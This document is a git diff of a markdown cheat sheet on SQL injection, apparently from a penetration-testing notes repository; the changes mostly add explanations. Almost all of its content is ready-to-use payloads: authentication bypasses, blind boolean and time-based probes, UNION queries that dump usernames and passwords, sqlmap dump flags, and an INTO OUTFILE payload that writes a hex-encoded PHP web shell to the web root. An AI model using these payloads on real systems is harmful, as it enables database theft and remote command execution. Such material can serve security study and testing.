updated SQL injection

Exploits/Databases/SQL Injection.md

@@ -1,48 +1,63 @@
 # SQL Injection
 
-* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)
+In an SQL injection an SQL command is ended prematurely through setting the quote earlier than intended by the original programmer. The malicious command is then ended by an SQL comment to ignore the following parts of the original SQL command.
+A piece of understanding the way of injecting malicious SQL commands is to understand the syntax of [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/). 
+
+* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
 
 ## Finding an Opportunity
+
 * GET parameter
 ```sh
 http://example.com/index.php?id=' or 1=1 -- -
 ```
-* Sometimes an ID or may come first
+
+* Sometimes another parameter may come first
 ```sh
 http://example.com/index.php?id=10 or 1=1 -- +
 http://example.com/index.php?id=10' or '1'='1'-- -
 http://example.com/index.php?id=-1' or 1=1 -- -&password=x
 ```
-* Provoke error to gain information
+
+* Provoking an error to gain information if an injection might be possible. Check by just putting in a single quote
 ```sh
 http://example.com/index.php?id='
 ```
 * **Incase of client side sanitization craft the URL instead of using the form!!!**
 
 ## Usage
-* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
+
+* Terminate the string of the SQL command via `'` and resolve via tautology like 1=1, comment the rest of the string via `--`. This defaults to a true statement and delivers a response containing DB content
+
 ```sql
 SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
 SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
 ```
 
+There are further methods of SQL injection following below.
+
 ### Boolean True and False
+
 ```sql
 SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
 SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
 ```
-* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char.
+
+* Blind boolean base substring fuzzes one char at a time, by inspecting the return value after each inserted char.
 ```sql
 ' UNION SELECT null,null,null where database() like 'da%';-- -
 ```
 
-### Time based
+### Time Based
-* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes
+
+* Checking input blindly via sleep() function. Count the number of columns in this way. on success, the sleep(5) function executes
 ```sql
 ' union select sleep(3), null; -- -
 ```
 
-### Blind injection // Guessing characters
+### Blind injection
+
+* A blind injection methods tries to guess characters not by returned values but by how the DB behaves to your request
 ```sh
 http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
 ```
@@ -53,13 +68,21 @@ http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
 * sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` 
 
 ### Union based
+
+Union based injections is an incremental and cautios approach.  
+Start by trying to provoke errors to validate a possible injection.  
+
 * _First method__ check by order until error occurs
 ```sql
 ' order by 1 -- -
 ' order by 2 -- -
 ' order by 3 -- -
 ```
-* __Second method__ fuzzing NULL values, followed by fuzzing data types
+
+Check the number of columns by inserting NULL values one after another.
+
+*  __Second method__ fuzzing NULL values, followed by fuzzing data types
+
 * Check number of cols
 ```sql
 ' UNION SELECT NULL--
@@ -67,20 +90,22 @@ http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
 ' UNION SELECT NULL,NULL,NULL--
 # until the error occurs
 ```
-* Check which one is a string
+
+* Check which one contains String values
 ```sql
 ' UNION SELECT 'a',NULL,NULL,NULL--
 ' UNION SELECT NULL,'a',NULL,NULL--
 ' UNION SELECT NULL,NULL,'a',NULL--
 ' UNION SELECT NULL,NULL,NULL,'a'--
 ```
-* Retrieve content, for cols and comment two times as an example. Or dump database
+
+* Retrieve content, for cols as an example, or dump database
 ```sql
 ' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
 ' UNION SELECT NULL,username,password,NULL FROM users -- //
 ```
 
-* Retrieve content by union poking the count and order, afterwards extracting tables via
+* Retrieve content by union poking the count and order of columns, afterwards extracting tables via
 ```sh
 0 union select null, null, database()
 0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
@@ -88,9 +113,13 @@ http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
 0 union select null, null, group_concat(username, ':', password from found_tablename
 ```
 
-* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
+The examples above contain methods of retrieving table name, column names. The last example uses the information returned to inject the correct column names so the acutal content of them are retrieved. Further examples under [SQL Functions](#### SQL Functions)
+
+## Further Information
 
 ### Identify Database 
+
+The following examples are methods of retrieving the type of DBMS in use.
 ```sh
 id=sqlite_version()
 id=@@version # mysql/mssql
@@ -98,13 +127,14 @@ id=(SELECT banner FROM v$version) # oracle
 ```
 
 #### SQL Functions
-* Use sql functions to fumble the tables & cols via union
+
+Use SQL functions to poke the tables & cols via union.
 * [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
 * Extract tables 
 ```sql
 1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
 ```
-* sqlite specific
+* SQLite specifica
 ```sql
 ' UNION SELECT sql, sql FROM sqlite_master -- -
 ```
@@ -112,18 +142,22 @@ id=(SELECT banner FROM v$version) # oracle
 (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
 (SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
 ```
-* Extract cols
+
+* Extract columns
 ```sh
 1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
 ```
-* Data from cols
+
+* Extract Data from cols
 ```sql
 1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
 ```
 
-## Insert
+## Value Insertion
 
-* Check user file permissions
+Under the right conditions, it is possible to insert information into a table.
+
+* Check user file permissions if an insertion is possible
 ```sql
 union all select 1,group_concat(user,0x3a,file_priv),3,4 from mysql.user -- -
 ```
@@ -138,16 +172,17 @@ union all select 1,group_concat(user,0x3a,file_priv),3,4 from mysql.user -- -
 " Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -
 ```
 
-### Examples
+### Further Examples
-* sqli inside HTTP request to an API. Five values inside select have been discovered before
+
+* sqli inside HTTP request to an API. Five columns in the select have been discovered before
 ```HTTP
 GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
 ```
-    * Get col names 
+    * Get column names 
     ```HTTP
     GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
     ```
-    * Get notes from users by id 
+    * Get rows from users by id 
     ```HTTP
     GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
     ```